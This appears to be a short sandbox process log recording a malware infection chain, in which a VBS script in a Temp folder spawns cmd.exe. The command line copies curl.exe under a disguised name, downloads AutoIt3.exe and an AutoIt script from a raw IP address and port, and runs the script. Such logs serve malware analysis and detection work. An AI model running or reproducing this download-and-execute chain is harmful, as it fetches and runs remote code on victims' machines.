wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\neverban_COifEs.vbs
3040cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir c:\ggrn & cd /d c:\ggrn & copy c:\windows\system32\curl.exe ggrn.exe & ggrn -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & ggrn -o aevajr.au3 http://66.42.63.27:2351/msiggrnjmvo & Autoit3.exe aevajr.au3
2256